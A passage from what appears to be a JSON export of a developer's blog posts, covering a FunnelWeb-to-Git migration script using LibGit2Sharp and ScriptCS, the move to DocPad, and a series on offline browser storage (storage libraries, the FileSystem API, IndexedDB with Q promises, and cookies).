and there’s an important difference between these two dates.\nAuthor date is the date when a commit was originally authored in the source repository.\nCommitter date is the date when a commit was applied to the current repository.\nThis is the important bit of information, generally speaking these two dates are the same but they don’t have to be. Say I create a patch file from my repository and send it to you, this will contain an author date, which is the date that I created the commit, and in my repository it matches the commit date. At some future point in time you’re going to add that patch to your repository and when you do that you’ll receive my author date but you’ll have a different commit date, for you see the date that you committed it to the repository has changed, but the commit itself hasn’t (if it did the whole commit would be invalid). A more in-depth write up can be found here.\nAnd this is where the power comes from, you can manipulate these dates. This means that I can extract my dates from FunnelWeb and author commits of a particular point in time, but commit them whenever makes sense.\nSide note: General wisdom says you shouldn’t mess around with the committer date, only the author date.\nManipulating GitWell now that we know that we can, at least in theory, manipulate our Git history to match the information that I’d like it to be, the question is how?\nA quick search found this on Stackoverflow, neat-o I can do something like this:\n>> git commit --amend --date="<Date from my post revision>" Well isn’t that nice, the command line exposes what I want, but either having to manually run the commands on the CLI or calling the CLI fro mcode is not a particularly pleasent an idea.\nEnter LibGit2 or more specifically LibGit2Sharp. If you’ve done anything with Git programmatically you’re probably familiar with these libraries. LibGit2 is an implementation of the Git core commands but being written in C it’s not that much fun for .NET developers so that’s where LibGit2Sharp comes in and it’s what we’ll be using.\nExporting out dataI’ll get back to Git in a moment as there’s something important we need to do before we can work with Git and that’s getting us some data.\nFor this I’m going to use Dapper which is a light-weight ORM to talk to the FunnelWeb database, but use whatever works best for you. The important part here is how we run our code.\nWell there’s an obvious option, we could go File -> New Console Application and get cracking, NuGet install our dependencies, etc.\nNah console applications are so 2012, instead I’m going to use ScriptCS.\nIf you haven’t heard of ScriptCS don’t fret, it’s a very new platform. ScriptCS is the brain child of Glenn Block, which is taking his learnings from being heavily involved in Node.js of recent and bringing that to the .NET world. Basically making a way which you can execute a C# file without the need for Visual Studio, the C# compiler or any of those tools we’re use to as .NET developers. Check out Scott Hanselmans post on the topic if you want to learn more.\nNote: You’ll need ScriptCS version 0.5.0 at least as you need my pull request included.\nGetting startedNow we have the idea sorted out, I’m going to start with a ScriptCS project which will use a Dapper to get our data out and LibGit2Sharp to push it into Git, seems nice and simple really. Let’s break this down into the smaller parts.\nOpening our Git repo The first step in our process will be to open up the Git repo so we can work against it. I’ve created a migrator folder which my migrator will reside within and then I’ll go create a new file called app.csx which is my ScriptCS file (note the csx extension).\nI’ll need a using for LibGit2Sharp and then I’m going to create a method which will resolve our Git repository. So my file now looks like this:\nusing LibGit2Sharp; static Repository InitOrOpen(string path) { var gitBasePath = Repository.Discover(path); if (gitBasePath == null) { Console.WriteLine("And we're creating a new git repo people!"); return Repository.Init(path); } Console.WriteLine("Found existing repo, keep on trucking"); return new Repository(gitBasePath); } using (var repo = InitOrOpen(@"C:\\_Code\\my-repo")) { Console.WriteLine("It's time to rock and rooooooooll"); } So my method InitOrOpen will take a path to a folder which is to be our Git repository. In the method it’ll use the Discover method of the Repository class which will locate the Git repository for the current folder or any of its parents. This means that I don’t have to pass the repository root, which works well for me using DocPad as I want to put my posts in src\\documents\\posts where my repository root is where the src folder exists.\nThe result of Discover will be the path which the Git repository resides in, as a string, which is null if there was no repository found. Based on that result we can choose to initialise a new Git repository, Repository.Init(path), or open the repository at the discovered path, new Repository(gitBasePath). This Repository object is what we’ll use to interact with Git from .NET.\nLastly the file will call the method in a using block which in turn just dumps out that we opened the repository.\nPackage.config Before we can run this ScriptCS file we’ll need get LibGit2Sharp installed, so how do we go about it… NuGet of course!\nFor this we’ll need a package.config file which defines our NuGet packages. Here’s where we’re at:\n<?xml version="1.0" encoding="utf-8"?> <packages> <package id="LibGit2Sharp" version="0.11.0.0" targetFramework="net45" /> </packages> Now we just need to run the ScriptCS file and our little app will do some logging out of messages!\nNote: When I was writing this I came across a problem, LibGit2Sharp expects the native Git assemblies to be in the same folder as LibGit2Sharp’s assembly. In a .NET app this is done by copying the NativeBinaries folder from the NuGet package into the bin folder as a post-build event in the csproj file. Since we don’t have a csproj in ScriptCS you need to manually copy that folder.\nPreping our data I’m not going to go into depth as to how to get your data out of your database to be pushing into Git, that’ll somewhat depend on the database and ORM you’re working with, you can find that from here in my source code.\nWhat is important to know is that ScriptCS doesn’t support dynamic in C#, so you’ll need to create a class which represents the object you’re pulling out of the database (the reason for this is at present Roslyn, which ScriptCS uses to do its execution doesn’t support it). I’ve done this by creating a Posts.csx file that is then loaded into ScriptSC.\nBut once we’ve got our data out of our database it’s time to push it into Git.\nGit it in ya We have our Git repository, we have our data, it’s time to do something about joining the two things together. Remember I said that I wanted each revision in my FunnelWeb database to be an individual commit in Git? Well that will be quite easy to do. The object model that I have brought back out of FunnelWeb respects that, each object is a snapshot of the post at a particular point in time. Next I’m going to have to do a few things:\nGet the comma-separated list of tags into an array Clean up my URI schema (in FunnelWeb it was very free-flowing, I want to normalize it a bit to the standard YYYY-MM-DD-name format) But I don’t want to break my existing SEO so I need to be able to track those old links and 301 them If a file doesn’t exist yet create a new file, otherwise update the existing one This is where it’s really cool, since we’ll just override the existing file and Git is pretty smart about diff-detection it’ll only track what changed between each version so we can then get nice clean diffs Now DocPad uses the fairly common YAML-style meta-data headers, but it also supports something they wrote specifically called cson which is a CoffeeScript version of JSON. Since I’ve always found YAML a pain I’m going to use that for my post meta data headers.\nLet’s start writing our file to disk then:\nforeach (var item in items) { var tags = item.Tags.Split(',') .Select(x => x.Trim()) .Where(x => !string.IsNullOrEmpty(x)); var uriParts = item.Path.Split('/'); if (uriParts.Count() > 1) { tags = tags.Union(uriParts.Take(uriParts.Count() - 1)); } var postPath = Path.Combine(Settings.OutputPath, item.Published.ToString("yyyy-MM-dd") + "-" + uriParts.Last()) + ".html.md"; if (!File.Exists(postPath)) File.CreateText(postPath).Close(); using (var sw = new StreamWriter(postPath)) { sw.WriteLine("--- cson"); sw.WriteLine(Formatters.CreateMetaData("title", item.Title)); sw.WriteLine(Formatters.CreateMetaData("metaTitle", item.MetaTitle)); sw.WriteLine(Formatters.CreateMetaData("description", item.Desc)); sw.WriteLine(Formatters.CreateMetaData("revised", item.Date)); sw.WriteLine(Formatters.CreateMetaData("date", item.Published)); sw.WriteLine(Formatters.CreateMetaData("tags", tags)); sw.WriteLine(Formatters.CreateMetaData("migrated", "true")); sw.WriteLine(Formatters.CreateMetaData("urls", new[] {"/" + item.Path})); sw.WriteLine(Formatters.CreateMetaDataMultiLine("summary", item.Summary)); sw.WriteLine("---"); sw.Write(item.Contents); } //git stuff } Ok, that’ll do nicely, I’ve extracted my tags, cleaned up my URIs, so /flight-mode/indexeddb becomes /posts/2013-05-27-indexeddb.html for example, and I’ve built up a meta-data header which contains all the information that I found to be important (check out the DocPad documentation to get a better idea of what meta-data is available and for what purpose).\nNow it’s time to get it into Git, and more importantly, get it into Git with the right author date. Remember how I said there are two dates which a commit has, well I’m only going to concern myself with the author date, since that was when the revision was created, but the date it when into the repository isn’t particularly important, for all it matters it could have been in another repository before now (which abstractly speaking it was).\nTurns out that this is actually really easy to do! In fact LibGit2Sharp exposes the API to do just that as part of the commit API!\nvar commitMessage = string.IsNullOrEmpty(item.Reason) ? "I should have given a reason" : item.Reason; repo.Index.Stage("*"); repo.Commit(commitMessage, new Signature("Aaron Powell", "me@aaron-powell.com", (DateTime) item.Date)); First things first I’ve created a commit message based off of the revision reason in FunnelWeb, next I’ll stage all changes in the repository (this is just so I can be lazy and not worry about the file name :P) and lastly commit the stage providing an author signature which contains the author date as an argument.\nI was honestly shocked at just how easy that process turned out to be!\nSo now when we execute the code it’ll build up a nice Git repository for us.\nConclusionAnd that’s it, with only 100 lines of code (which contains a rather large SQL statement too) I was able to pull all the data out from FunnelWeb and then push each post revision as a separate Git commit.\nYou’ll find the full code for my migrator in my sites repository.\nOne final note though, I did have the following two problems:\nThe migrator didn’t like being run in the same repository as I was opening with LibGit2Sharp, I think the problem was related to ScriptCS locking the /bin folder which Git then didn’t have any access to and it’d crash. I didn’t look too deeply into this (C ain’t my forte these days) and it was easily solved by having the migrator source in a separate location (and it also meant I didn’t accidentally commit my real connection string) LibGit2Sharp didn’t seem to like it when I wasn’t in the master branch. I initially tried to use a separate branch to create all the commits that I’d then review and rebase into master, but whenever I did this it would create a new repository in the destination folder so I ended up with nested Git repositories. Again I didn’t delve into the underlying reason, I left it for Brendan to entertain himself with, instead I just did it in master and deleted my clone the few times I stuffed up :P ", "id": "2013-06-11-funnelweb-to-git" }, { "title": "New blog, less FunnelWeb", "url": "https://www.aaron-powell.com/posts/2013-06-10-new-blog-less-funnelweb/", "date": "Mon, 10 Jun 2013 00:00:00 +0000", "tags": [ "funnelweb", "docpad" ], "description": "It's time for a refresh, my blog has made a move, this time away from FunnelWeb.\n\nBut why, how and what for the future of FunnelWeb?", "content": "If you’re not viewing this via the website (ie - you’re reading it in a RSS reader) you’re probably not going to notice but I’ve just done a new design and as a side project I’ve also decided that it’s time to do a shift in the platform.\nYou see, I’ve been using FunnelWeb for a few years now, and it’s been going smoothly, sitting there chugging along doing all that I’ve really needed from it, but in recent months I’ve decided that there was something that didn’t really want anymore… a database.\nSince all the content for my blog was stored in a database I was at the mercy of my hosting provider, if something happened to them, they had hardware failures, a security breach, etc, I had no copy of my content that I could easily shunt somewhere else and get back online. Admittedly this has never happened but still, I felt that the lack of real ownership of my content, ultimately I didn’t have a copy of it… anywhere.\nOver the last 12 to 18 months there’s been a real shift in how to manage content, especially for simple sites such as what my blog is. The idea is to use a static site generator and flat files for the content input. This then results in a bunch of HTML files that can then be served out for your site, I mean really it’s not like the content of my blog changes all that frequently so the idea of it being constantly generated on the fly doesn’t really make sense. Something like FunnelWeb seems like an overkill for what I need, a series of HTML files.\nSo what are your options? Well there’s a few out there:\nJekyll is a popular choice which is written in Ruby Pretzel if you want to stick with a .NET base DocPad is an implementation in Node.js, and this is what I went with (for no reason other than I used DocPad when it was v1 and wanted to see what’d changed). All my content is now stored in a GitHub repo as a combination of Markdown and Eco templates (with a design from HTML5UP) and it gives me a lot of freedom about the content layout, more importantly I have copies of my content stored on my various devices, I have full history of the changes and it can be stored on any number of git hosts.\nSo as you read this you’re reading something that has been served from a static HTML file generated by DocPad, rather than some content pulled from a database that is parsed on request and a HTML result generated.\nThe future of FunnelWebWith the move of my blog off FunnelWeb someone is bound to ask the question about the future of FunnelWeb. In fact the question recently came up on the mailing list, ultimately it comes down to that Jake and I consider it done. I plan to keep an eye on pull requests but at present there’s no plan to add new features going forward.\n", "id": "2013-06-10-new-blog-less-funnelweb" }, { "title": "Flight Mode - Libraries", "url": "https://www.aaron-powell.com/posts/2013-05-30-libraries/", "date": "Thu, 30 May 2013 00:00:00 +0000", "tags": [ "flight-mode", "indexeddb", "localStorage", "sessionStorage", "offline-storage" ], "description": "", "content": "Throughout the last few posts we’ve looked at the different ways which we can store data offline in browsers and then created a basic little API that will help is with doing that. The FlightMode API that we’ve been working with was though was really quite a simplistic approach to the problem that we were presented with, ultimately the API isn’t meant for production use.\nSo when looking at the different storage options what do we have if we did want to go to production? In this article we’re going to look at some of the different API wrappers for the different storage technologies that we’ve looked at.\nLawnchairSite: http://brian.io/lawnchair/\nLawnchair is one of the most fully featured storage options that we’ve got available to us, and also what I based the concept of FlightMode on. Lawnchair offers a variety of ways which you can store data, through its adapter system, you can plug in which ever storage option you want, and there’s a few options. The one that doesn’t exist is cookies but as I pointed out in that post they aren’t exactly the best option when it comes to storing data.\nAnother interesting aspect of Lawnchair is it is asynchronous by default, so using adapters like localStorage (which they refer to as DOM storage) requires a callback argument passed to it. This is nice as it means you have a more consistent API usage when it comes to using actually asynchronous APIs like IndexedDB and FileSystem.\nThe main drawback I find is that because Lawnchair provides such a vast array of storage options behind a consistent programming API you ultimately loose some of the power of the underlying provider. This is especially a problem with IndexedDB, you loose a lot of the power of indexes and querying against those. But if you’re goal is to have offline storage across as large a browser set as possible then it’s a price you’ll have to pay.\nLawnchair really is a good choice if you want to be able to do storage across a lot of platforms and use feature detection to work out exactly what adapter can be used.\nAmplifyJS.storeSite: http://amplifyjs.com/api/store/\nAmplifyJS.store like Lawnchair aims to be an API simplification of the various browser storage models but rather than trying to be a one-size-fits-all option it is more focused on just key/value storage, in particular localStorage and sessionStorage.\nThe programmatic model of AmplifyJS.store is also much simpler, rather than trying to provide helper methods to do things like filtering objects it provides the minimal surface area and leaves that up to you, so providing you with a method to get all objects then you can perform your own map, filter, etc operations. This is good as it doesn’t try and pretend that the underlying store is something that it’s not.\nThe API is also synchronous unlike Lawnchair which does have upsides that you can avoid the complications that can arise from asynchronous programming and callback hell.\nAmplifyJS.store is a nice API if you want something that is simple and just does the job of handling key/value storage without trying to go over the top.\nPouchDBSite: http://pouchdb.com/\nPouchDB is one of the most powerful libraries when it comes to working with complex data stores in the browser (it also supports node.js) and is very much a specialist of storing data with IndexedDB. It’s an implementation of the CouchDB programming interface built on top of IndexedDB (there are providers for WebSQL, levelDB and a HTTP interface) that gives you a lot of power when it comes to interacting with the underlying data stores.\nAnother killer feature of PouchDB is that it has the ability to sync directly to a CouchDB instance via the HTTP interface. This means that if you’re using CouchDB as your backend then you’ve got an option to easily keep your data in sync between your client and server. This is really handy, particularly in the scenario I’ve been trying to paint over this series of being able to maintain user state even when they are offline.\nThe obvious drawback of this is that it’s really geared around CouchDB developers so the API is designed for them. That said it doesn’t mean that it’s a bad API or something that can’t be used without CouchDB, it definitely can and it is very good at turning the IndexedDB programming API into something that is even closer to being a full NoSQL database by exposing map/reduce directly from the query API.\nIf you’re looking for a very full-featured IndexedDB wrapper then PouchDB should be given a very serious look.\ndb.jsSite: https://github.com/aaronpowell/db.js\ndb.js is a library that I wrote with the single goal of improving the programmatic API for IndexedDB. As I mentioned in my article on IndexedDB I find that the API is very verbose and quite foreign to front-end development so I wanted to set out and improve that.\nThe other main design goal was to make the event handling better, more specifically to utilize Promises. so that you could assign multiple handlers to events that get raised and interact with them that way. It was also so it could be interoperable with other asynchronous operations and other libraries that implement Promise APIs.\nFinally I wanted a really simple way which you could query the data stored, again in a manner that is familiar to JavaScript developers. For this I went with a chaining API (made popular from jQuery) so that you could do all your operations in a single chain, but I also expose the important query features built in such as querying on a specific index, only the chaining is also allowing you to query in a more expanded manner, say first on an index and then on a custom function.\nUltimately this is a very thin wrapper over IndexedDB and it’s only designed for IndexedDB usage which makes it an ideal candidate if that’s your only target platform and you want something very light weight.\nConclusionThis has been a brief overview of a number of different JavaScript libraries for working with different offline storage models, libraries from the generic abstraction all the way down to specific implementations.\nBy no means is this an extensive list of libraries available, I’m sure that there’s dozens more out there that would be worth looking into, but ultimately this was meant to be an introduction to a few which I see a great deal of promise in.\n", "id": "2013-05-30-libraries" }, { "title": "Flight Mode - FileSystem API", "url": "https://www.aaron-powell.com/posts/2013-05-28-file-system/", "date": "Tue, 28 May 2013 00:00:00 +0000", "tags": [ "flight-mode", "offline-storage", "file-system" ], "description": "", "content": "The last piece of the puzzle when looking at offline storage options is a bit of a shift from what we’ve been looking at so far. Generally speaking we’ve been looking at how to store plain data, either through key/value stores or as objects. This time we’re going to look at the other kind of data you might want to store, files.\nThere’s two way we might want to store files, as binary data in IndexedDB or using the FileSystem API. Since we looked at IndexedDB last time (although didn’t cover how to store Blobs, but the principle is the same as we looked at) this time we’ll look at the FileSystem API.\nSide note: At the time of writing the only browser supporting this API is Chrome so this is more of a “watch this space” style post than a “go use it now” one.\nThe idea of the FileSystem API is to give browsers the ability to persist files either temporarily or permanent. Temporary persistence means that the browser is free to decide when it wants to get ride of the file system that has created where as permanent persistence means that it will not do an automatic cleanup of the files and folders.\nEssentially what you end up with from the API is an ability to create files and folders in a sandboxed scenario. You don’t have access to the real file system of the device, so no access to My Documents or Program Files, just an isolated little location to work in. So this can be really quite useful if you’re say building a game, chances are you have a few assets that are required (audio, video, graphics) and the ability to retrieve them without web requests can be advantageous.\nBenefits of the FileSystem for storage As mentioned this API is serving a different purpose to the other storage APIs we’ve looked at, with the exception of IndexedDB (in a limited scenario at least) so some of the benefits are unfair comparisions.\nLike IndexedDB the FileSystem API is an asynchronous API which has the obvious benefits when it comes to working with the kind of data it is designed for, storing large files you do ideally want that to be done asynchronously so that you aren’t blocking the users interactions.\nAnother benefit is that the file system you create is completely sandboxed, meaning you don’t have to worry about what others may try and do to it. The only thing you need to take into account is the persistence level of the file system, as mentioned above temporary file systems are at the browsers mercy for clean-up, but it’s an opt-in to be using temporary persistence.\nAs with other storage options there are size limitations on the file system that is created, the difference is (at least at the time of writing) you can specify the size of the file system you want. Chrome will then determine whether the user needs to approve this storage level and if so request permission like other device-sensitive APIs (getUserMedia for example).\nThe API itself is quite nice to work with, especially if you’re coming from a server background, creating new files is handled through writer streams while you have separate streams for reading files. You can store files of different types with different encodings and have a lot of flexibility to create a directory structure that suites your needs.\nDrawbacks of the FileSystem for storage The main drawback is browser support, as mentioned Chrome is the only browser at present that implements the FileSystem API and it seems that one of their main drivers is use within their extension system. While there’s nothing wrong with that it does mean that it’s not really possible to utilize this API is a cross-browser scenario. There is a shim available that uses IndexedDB but it does require your IndexedDB implementation to support Blob storage which can be a problem in Internet Explorer 10.\nAnother drawback is the API interactions, while it’s not quite as verbose as working with IndexedDB the API itself partially relies on the DOM Level 3 events and partially relies on callbacks being provided. This means that in some instances you’ll be attaching event handlers, like when you’re using a FileReader:\nvar reader = new FileReader(); reader.onloadend = function (e) { ... }; reader.readAsText(file); And other times you’ll have to pass a callback:\nwindow.requestFileSystem(window.TEMPORARY, 1024*1024, onInit, onError); API inconsistence can be annoying for developers to work with and something that you need to be mindful of.\nThe final drawback I see is that there’s no file system querying available, meaning you have to know where your files are stored, which can be a bit tricky when you’re working with directories in your file system. Admittedly this is a minor problem, you probably shouldn’t be storing files that you don’t know the location of in the file system but it can still be something that you’d want.\nImplementing FileSystem storage Unlike the other storage options I’ve decided to not cover off how to implement this API because:\nIt really wouldn’t fit with the FlightMode API we’ve got so far, that’s designed for non-hierarchical data This is more of a watch this space post than a go use it one since the browser support is quite lacking There is a great article on HTML5 Rocks that’ll do it more justice than I can give it ConclusionThe idea of being able to store files, complete files, in a structured manner on the client is a really exciting one. Admittedly there’s a much narrower use-case for such an API compared to other storage options we’ve discussed the problems that it solves are very real and will likely become more valid as more true web applications rise.\nThe API itself is not back to work against, if it is a bit inconsistent and keep in mind that the specification is still in draft status so it may change in the future.\n", "id": "2013-05-28-file-system" }, { "title": "Flight Mode - IndexedDB", "url": "https://www.aaron-powell.com/posts/2013-05-27-indexeddb/", "date": "Mon, 27 May 2013 00:00:00 +0000", "tags": [ "flight-mode", "offline-storage", "indexeddb" ], "description": "", "content": "The next stop in our offline storage adventure is to look at the big daddy of offline storage, IndexedDB. Now I’ve blogged about IndexedDB in the past but today I want to talk about it in a bit higher level and introduce the idea of IndexedDB beyond just how to use the API.\nIndexedDB is the latest approach to doing offline storage in offline applications, it is designed as a replacement for the WebSQL spec which is now discontinued. One of the main reasons that WebSQL was discontinued was because it was tied to a specific version of SQLite which introduced some problems. Need to change something in the way the API worked you needed to change the SQLite specification first. So IndexedDB was proposed as a replacement to WebSQL and the design was not tied to any particular underlying technology (I’ve previously blogged about how different browsers store their data).\nIndexedDB is quite different to WebSQL where instead of being a dialect of the SQL language IndexedDB much more closely related to a NoSQL, or Document Database (it’s not true document database but I’m not here to argue semantics). Data is stored as the objects that they are (once they’ve been cloned, so you don’t maintain prototype chains), not as strings like we’ve seen in the other options.\nBenefits of IndexedDB for storage There’s several important benefits of IndexedDB over the other storage options we’ve looked at, the first is something that’s a very big break from other options, asynchronicity.\nWhere the other APIs all perform their operations in a synchronous manner IndexedDB doesn’t. This means that we get the benefits of having a non-blocking operation, so if you’re writing a large amount of data, you are on a low powered device, are experiencing high disk I/O, etc then you don’t want to have the user seem like your web application has crashed while you’re storing their data. Asynchronous operations aren’t exactly a new concept on the web so it’s nice to see that it’s come to the storage level.\nThe next benefit is transactions. Anyone who’s done database work will know the benefit of this within an application. Once you start doing lots of read/write options, accepting user input and so on the chance of getting data that you can’t handle is high. Transactions give you a benefit so that you can group operations and then if they fail roll them all back without getting your data store into a corrupt state. Transactions can also be read-only or read-write meaning that you can more selectively lock your data depending on the kind of operations being undertaken an limit the chance of corruption.\nAnd then there’s the way it handles data, where the previous options were storing data as strings, meaning we have to serialize/deserialize IndexedDB stores the data as the objects that were provided (admittedly there’s a few steps it goes through first). This means that we can do a few smarter things on top of what we could do with strings, firstly we can create indexes. Again if you’re familiar with databases you’ll be familiar with indexes, but basically these allow us a nifty way to produce optimal query points. Say you’ve got people objects and you always query by firstName so then you can create an index so it’ll optimize that kind of query. Which then leads on to the next part about handling data, querying. Since we’re storing full objects when we want to find data (such as with our getAll method) we have our full object to then work against rather than just doing it against the full in-memory collection.\nDrawbacks of IndexedDB for storage The biggest drawback of IndexedDB is probably going to be a pretty obvious one for an API that is as new as it is and that’s browser support. At the time of writing the following browsers support IndexedDB unprefixed:\nInternet Explorer 10+ Chrome 25+ Firefox 19+ So you can see that there’s a major limitation when we’re looking to go offline, the mobile space. Because of the browser support Windows Phone 8 is the only phone that supports IndexedDB natively. Luckily there’s hope, there’s a shim for IndexedDB that used WebSQL as the underlying store. This means that iOS Safari (and desktop Safari) as well as Android can have the API exposed to them.\nThe other biggest drawback for me is the API, it’s excessively verbose and generally feels very foreign to front-end development. Things like transaction, index and cursor are not really common concepts when you talk to front-end developers. And then there’s API calls like cursor.continue() when you’re iterating through a query, while it might look innocuous the problem is that continue is a reserved word in JavaScript so pretty much every editor I’ve used (and most linters) will raise a squiggly/warning which the ODC-coder in my flinches at, resulting in a lot of code people write like cursor['continue']();. And on the verbosity, say you want to query a store on a non-unique index (our firstName property for example), to do that you must:\nHave an open connection to your database, indexedDB.openDatabase('my-db'), and wait for it to succeed Open a transaction, db.transaction('my-store') Open the store from the transaction, transaction.objectStore('my-store') Open an index from the store, IDBKeyRange.only('firstName', 'Aaron') Open a cursor with the index, store.openCursor(index), and wait for it to succeed In the success method of the query check to see if there was a cursor, if there was get its value and either work with it our push it to an array in the closure then call cursor.continue() or if there was no cursor ignore it (no cursor is the end of the query) In the success method of the transaction process the captured values, assuming you wanted to work with them all together That’s a lot of steps to get data by a property…\nThis then brings us to how you listen to the asynchronous actions. Generally you’ll see code like this:\nrequest.onsuccess = function (e) { ... }; To me that feels very reminiscent of the IE6 era where events were registered by on<something>. Admittedly you can use addEventListener since IndexedDB uses the DOM3 event specification, but it seems to be the less-used approach in the documentation.\nImplementing IndexedDB storage When we have a look at implementing IndexedDB storage on top of our FlightMode API that we’ve been using there’s an immediate problem, we’ve been only working with synchronous APIs up until now but as I mentioned above one of IndexedDB’s benefits is that it is asynchronous. Because of this we’ll have to approach the API usage a bit differently, first up the FlightMode constructor now has two new arguments, a migrate and a ready callback argument. The ready argument is the most important one, it will be triggered when our IndexedDB connection is open and we can start using the API. The migrate callback on the other hand is used to allow you to manipulate the objectStore (such as create indexes) if required. Additionally to make it nicer to work with the asynchronous nature of the API I’ve leverages the Promise/A+ specification for handling the events via the Q library.\nSide note: If you’re not familiar with Promises have a read through my series on exploring them with jQuery. It’s not exactly the same as Promise/A+, you can read about the differences here.\nWarning: This is a really basic IndexedDB implementation, it glances over much of the really powerful features, such as complex index queries, for information on that check out my other IndexedDB posts.\nOur internal Store object has got a much more complex constructor this time since there’s a few more things we need to do, we must:\nOpen our connection to the database Create the object store if required Notify the consumer that the API is ready So it will look more like this:\nvar Store = function (name, onMigrate, onSuccess) { var that = this; var request = indexedDB.open('flight-mode'); this.storeName = name; request.onsuccess = function (e) { that.db = e.target.result; onSuccess(); }; request.onupgradeneeded = function (e) { var db = e.target.result; var store = db.createObjectStore(name, { keyPath: '__id__', autoIncrement: true }); if (onMigrate) { onMigrate(store); } }; }; One nice thing about IndexedDB is that it can automatically create an id for the object, which I’ve turned on (it’ll be stored in the __id__ property) and set to autoIncrement: true so that it will create a new one for each record.\nTo use this we would do something like so:\nvar ready = false; var store = new FlightMode('my-store', 'indexedDB', function () { ready = true; }); It is a bit tedious that we’d have to check for the ready flag before any query or risk the API not being ready to use but that is something you can program around with Promise/A+ pretty easily.\nAs I mentioned in my drawbacks list the API is very verbose, but we can still make it reasonably simple to use as a consumer and hide away that verbosity. Let’s look at the add method. Again since this is asynchronous we’ll need to take that into consideration. This is where I’m leveraging Q, I’m creating a deferred object that you then will interact with.\nStore.prototype.add = function(obj) { var transaction = this.db.transaction(this.storeName, 'readwrite'); var store = transaction.objectStore(this.storeName); var d = Q.defer(); store.add(obj).onsuccess = function (e) { d.resolve(e.target.result); }; return d.promise; }; First things first we need to create a new transaction, this is a writable transaction since we’ll manipulate data. From said transaction we can then go out and get our object store that we’re writing to. Lastly we setup our deferred object from Q which we’ll then return so we can use the Promise. When you add a record into the object store it’ll fire off the success event when done and an error event if it was to fail. I’m omitting error handling here to save code, but you’d capture the IDBRequest from the add call which you attach other handlers to.\nWhen the request is successful the events target will be the id that was generated by IndexedDB for us. If you’re not using auto-incrementing IDs the value will be what ever you defined as your keyPath anyway. I’m then resolving that out via our Promise resulting in an API usage like so:\nstore.add({ firstName: 'Aaron', lastName: 'Powell' }).then(function (id) { console.log('Object stored with id', id); }); Getting a record out by it’s id is also reasonably trivial once you understand the basis of IndexedDB, here’s the code:\nStore.prototype.get = function(id) { var transaction = this.db.transaction(this.storeName); var store = transaction.objectStore(this.storeName); var d = Q.defer(); store.get(id).onsuccess = function (e) { var obj = e.target.result; if (obj) { d.resolve(obj); } else { d.reject('No item matching id "' + id + '" was found'); } }; return d.promise; }; We have a few things in common with the add method, but this time we don’t specify what type of transaction we want. If you don’t specify a type it will be read-only as transactions are read-only by default.\nNote: If you want to be explicit about it pass in readonly as the second argument.\nLike add the store.get method returns an IDBRequest which we listen for events on. When the object doesn’t exist in our store it won’t raise an error as this isn’t really an error state, instead we’ll have the request succeed and the target of the event will be null. This means that we have to do the check inside the success handler and in this case I’m rejecting the Promise with an error message to consumers.\nWe end up with a usage like so:\nstore.get(1).then(function (obj) { console.log('Object found', obj); }, function (msg) { console.log(msg); }); The final thing that really gets the power out of IndexedDB is that we can produce indexed queries, so finding items is more optimal. To do this we need to leverage the migrate callback so we can create ourselves an index for the objectStore. it would look something like this:\nvar store = new FlightMode('my-store', 'indexedDB', function () { ready = true; }, function (store) { store.createIndex('firstName', 'firstName'); }); The migrate method receives an instance of our objectStore which we can then create indexes from using the createIndex method. This takes a name for the index and a keyPath for the property of the object we want to index. Optionally you can pass in some options such as whether it should be a unique index.\nWith the index created we can then use it within the getBy method, like so:\nStore.prototype.getBy = function(property, value) { var transaction = this.db.transaction(this.storeName); var store = transaction.objectStore(this.storeName); var d = Q.defer(); var items = []; var index = index = store.index(property); index.openCursor().onsuccess = function (e) { var cursor = e.target.result; if (cursor) { items.push(cursor.value); cursor['continue'](); } }; transaction.oncomplete = function () { d.resolve(items); }; return d.promise; }; To query the index we need to use a cursor (and as I mentioned above the continue method is annoying…). Next we listen to the success event of the cursor request, extracting the items out as we navigate through the cursor.\nOnce the cursor is exhausted the transaction will be completed and then we can resolve all the items which we wanted from it.\nYou can find the rest of the implementation in the github repository.\nConclusionIndexedDB is still rather new a technology so it’s something that needs to be used with a certain bit of caution, if you can’t target only the latest browsers then it might not be possible to use it in your application.\nThat said it is a really powerful API, the fact that it is asynchronous is alone a reason that it should be chosen over pretty much any other storage option when storing large amounts of data.\nWhile there are drawbacks with the API design, particularly the fact that it can be very verbose and very foreign to web developers it isn’t that difficult to hide away the bulk of the API with your own façade, using libraries like Q to make it easier to interact with the API and only exposing the features that you really need in your application.\nDefinitely keep an eye on IndexedDB in the coming years, especially when doing Windows 8 applications, as it’ll be more available and more important for building offline applications.\n", "id": "2013-05-27-indexeddb" }, { "title": "Flight Mode - Cookies", "url": "https://www.aaron-powell.com/posts/2013-05-23-cookies/", "date": "Thu, 23 May 2013 00:00:00 +0000", "tags": [ "offline-storage", "flight-mode", "cookies" ], "description": "", "content": "In the beginning there was a simple way to store data offline in an application, or more accurately, across sessions, and that is the HTTP Cookie.\nCookies are used for everything, they can track you for spammers, expose your secure connections for hackers and they can be used for legitimate purposes which I’m going to look at here.\nThe Cookie is the oldest form of offline storage available on the web, first emerging in the mid 90’s with Netscape. All browsers support them so it’s your most easily accessible cross-browser storage solution.\nBenefits of Cookies for storage There are a few aspects to cookies that make them appealing for storing offline data so let’s have a look at a few of them.\nSince cookies are part of the HTTP Header they are included in every request that you make which can be useful if you want to sync the data that’s been created while the application is offline back to the server when the user reconnects. There’s no special AJAX request you’d need to create to handle the sync, any request would do, it’s just up to your server to handle said cookies. This has an obvious downside though, the more you store in cookies the bigger your request/response payload is going to be, so keep that in mind if you want to use cookies for storing data, particularly when limited data connections are applicable, such as on mobile devices).\nExpiry is another benefit that cookies bring to the table. If you’re storing data offline you may be wanting to get rid of it after a certain time period to prevent it from becoming stale. Cookies have an expiry date built into them when they are created, meaning that when you first set up your stored data you can determine just how long you want it to hang around. Admitted it won’t “magically” disappear if the user is offline at the time, but it will expire through new requests that are done.\nDrawbacks of Cookies for storage Unsurprisingly there are some drawbacks to using cookies, some pretty major ones to be exact too, the first main drawback is that cookies are simply not designed to be used this way. While it might sound great to be able to have your offline data sent to the server without you needing to do anything it really starts to come apart when you want to store much data. Cookies can only handle which means that they’re best used for little flags, maybe tracking a simple preference like which theme to use.\nAnother major drawback is that cookies have the laxest cross-origin restrictions of all the offline storage options we’ll be looking at. As I mentioned earlier cookies were a common tool in the spammers toolbox and that was because you could very easy get data out of them without owning the domain, sure you still had to get your code into the page but if your serving ads then you’re part of the way there already.\nFinally the API for cookies really does leave a lot to be desired. Don’t get me wrong there’s a myriad of wrapper APIs for the document.cookies object that’ll help you add/remove cookies but it doesn’t solve the fundamental problem, cookies are only strings, meaning if you want to store an object of some description it’s serializing to JSON for you. This really starts to fall over when you 